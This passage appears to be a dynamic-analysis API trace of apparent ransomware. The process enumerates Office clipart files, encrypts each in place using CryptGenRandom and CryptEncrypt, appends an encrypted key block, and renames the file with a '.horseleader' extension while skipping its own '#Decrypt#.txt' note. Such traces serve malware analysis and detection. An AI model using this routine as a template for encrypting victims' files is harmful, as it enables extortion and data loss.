lpNumberOfBytesWritten=0x32aedf4*=0x1384, lpOverlapped=0x0) returned 1 [0253.041] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.041] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.041] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.042] CloseHandle (hObject=0x158) returned 1 [0253.042] GetProcessHeap () returned 0x780000 [0253.042] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.042] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF.horseleader") returned 79 [0253.042] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04384_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04384_.wmf.horseleader")) returned 1 [0253.043] GetProcessHeap () returned 0x780000 [0253.043] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.043] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, 
ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x138c, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN04385_.WMF", cAlternateFileName="")) returned 1 [0253.043] lstrcmpiW (lpString1="AN04385_.WMF", lpString2="Windows") returned -1 [0253.043] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 67 [0253.043] StrStrIW (lpFirst="AN04385_.WMF", lpSrch=".horseleader") returned 0x0 [0253.043] lstrcmpW (lpString1="AN04385_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.043] lstrcmpW (lpString1="AN04385_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.044] lstrlenW (lpString=".testttjffg") returned 11 [0253.044] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.044] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.044] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.044] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04385_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.044] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 67 [0253.044] StrStrW (lpFirst="AN04385_.WMF", lpSrch=".txt") returned 0x0 [0253.044] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=5004) returned 1 [0253.045] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, 
lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x138c, lpOverlapped=0x0) returned 1 [0253.047] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffec74, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.047] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x138c, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x138c, lpOverlapped=0x0) returned 1 [0253.047] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.047] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.047] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.048] CloseHandle (hObject=0x158) returned 1 [0253.048] GetProcessHeap () returned 0x780000 [0253.048] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.048] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF.horseleader") returned 79 [0253.048] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04385_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04385_.wmf.horseleader")) returned 1 [0253.049] GetProcessHeap () 
returned 0x780000 [0253.049] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.049] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfc41400, ftCreationTime.dwHighDateTime=0x1bd4c15, ftLastAccessTime.dwLowDateTime=0x5f409670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcfc41400, ftLastWriteTime.dwHighDateTime=0x1bd4c15, nFileSizeHigh=0x0, nFileSizeLow=0x1cd8, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BABY_01.MID", cAlternateFileName="")) returned 1 [0253.049] lstrcmpiW (lpString1="BABY_01.MID", lpString2="Windows") returned -1 [0253.049] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 66 [0253.049] StrStrIW (lpFirst="BABY_01.MID", lpSrch=".horseleader") returned 0x0 [0253.049] lstrcmpW (lpString1="BABY_01.MID", lpString2="#Decrypt#.txt") returned 1 [0253.049] lstrcmpW (lpString1="BABY_01.MID", lpString2="_uninstalling_.png") returned 1 [0253.049] lstrlenW (lpString=".testttjffg") returned 11 [0253.050] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID", lpSrch=".testttjffg") returned 0x0 [0253.050] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.050] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.050] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\baby_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.050] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 66 [0253.051] StrStrW (lpFirst="BABY_01.MID", lpSrch=".txt") returned 0x0 [0253.051] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7384) returned 1 [0253.051] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1cd8, lpOverlapped=0x0) returned 1 [0253.053] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe328, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.053] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1cd8, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1cd8, lpOverlapped=0x0) returned 1 [0253.053] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.054] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.054] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.054] CloseHandle (hObject=0x158) returned 1 [0253.054] GetProcessHeap () returned 0x780000 [0253.054] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.054] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID.horseleader") returned 78 
[0253.054] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\baby_01.mid"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\baby_01.mid.horseleader")) returned 1 [0253.055] GetProcessHeap () returned 0x780000 [0253.055] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.055] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5178e0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1306, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD00116_.WMF", cAlternateFileName="")) returned 1 [0253.055] lstrcmpiW (lpString1="BD00116_.WMF", lpString2="Windows") returned -1 [0253.056] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 67 [0253.056] StrStrIW (lpFirst="BD00116_.WMF", lpSrch=".horseleader") returned 0x0 [0253.056] lstrcmpW (lpString1="BD00116_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.056] lstrcmpW (lpString1="BD00116_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.056] lstrlenW (lpString=".testttjffg") returned 11 [0253.056] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.056] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.056] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.056] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00116_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.059] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 67 [0253.059] StrStrW (lpFirst="BD00116_.WMF", lpSrch=".txt") returned 0x0 [0253.059] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=4870) returned 1 [0253.059] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1306, lpOverlapped=0x0) returned 1 [0253.064] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffecfa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.064] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1306, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1306, lpOverlapped=0x0) returned 1 [0253.065] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.065] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.065] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, 
lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.065] CloseHandle (hObject=0x158) returned 1 [0253.114] GetProcessHeap () returned 0x780000 [0253.114] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.114] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF.horseleader") returned 79 [0253.114] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00116_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00116_.wmf.horseleader")) returned 1 [0253.117] GetProcessHeap () returned 0x780000 [0253.117] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.117] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2332bb00, ftCreationTime.dwHighDateTime=0x1bd4fa4, ftLastAccessTime.dwLowDateTime=0x5f42f7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2332bb00, ftLastWriteTime.dwHighDateTime=0x1bd4fa4, nFileSizeHigh=0x0, nFileSizeLow=0x6906, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD00141_.WMF", cAlternateFileName="")) returned 1 [0253.117] lstrcmpiW (lpString1="BD00141_.WMF", lpString2="Windows") returned -1 [0253.117] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 67 [0253.117] StrStrIW (lpFirst="BD00141_.WMF", lpSrch=".horseleader") returned 0x0 [0253.117] lstrcmpW (lpString1="BD00141_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.117] lstrcmpW 
(lpString1="BD00141_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.117] lstrlenW (lpString=".testttjffg") returned 11 [0253.117] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.117] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.117] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.118] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00141_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.118] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 67 [0253.118] StrStrW (lpFirst="BD00141_.WMF", lpSrch=".txt") returned 0x0 [0253.118] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=26886) returned 1 [0253.119] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.121] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.122] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.122] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, 
lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1906, lpOverlapped=0x0) returned 1 [0253.122] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe6fa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.123] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1906, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1906, lpOverlapped=0x0) returned 1 [0253.123] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.123] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0253.123] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.123] CloseHandle (hObject=0x158) returned 1 [0253.124] GetProcessHeap () returned 0x780000 [0253.124] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.124] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF.horseleader") returned 79 [0253.124] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00141_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00141_.wmf.horseleader")) returned 1 [0253.125] GetProcessHeap () 
returned 0x780000 [0253.125] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0253.125] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb983d700, ftCreationTime.dwHighDateTime=0x1bf148e, ftLastAccessTime.dwLowDateTime=0x5f42f7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb983d700, ftLastWriteTime.dwHighDateTime=0x1bf148e, nFileSizeHigh=0x0, nFileSizeLow=0x7114, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="BD00146_.WMF", cAlternateFileName="")) returned 1 [0253.125] lstrcmpiW (lpString1="BD00146_.WMF", lpString2="Windows") returned -1 [0253.125] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 67 [0253.126] StrStrIW (lpFirst="BD00146_.WMF", lpSrch=".horseleader") returned 0x0 [0253.126] lstrcmpW (lpString1="BD00146_.WMF", lpString2="#Decrypt#.txt") returned 1 [0253.126] lstrcmpW (lpString1="BD00146_.WMF", lpString2="_uninstalling_.png") returned 1 [0253.126] lstrlenW (lpString=".testttjffg") returned 11 [0253.126] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF", lpSrch=".testttjffg") returned 0x0 [0253.126] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0253.126] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0253.126] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00146_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0253.127] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 67 [0253.127] StrStrW (lpFirst="BD00146_.WMF", lpSrch=".txt") returned 0x0 [0253.127] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=28948) returned 1 [0253.127] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.130] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.131] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0253.131] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2114, lpOverlapped=0x0) returned 1 [0253.131] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffdeec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0253.132] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2114, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2114, lpOverlapped=0x0) returned 1 [0253.132] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0253.132] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, 
lpOverlapped=0x0) returned 1 [0253.132] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0253.133] CloseHandle (hObject=0x158) returned 1 [0253.133] GetProcessHeap () returned 0x780000 [0253.133] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0253.133] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF.horseleader") returned 79 [0253.133] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF" (normalized: "c:\\program files\\microsoft 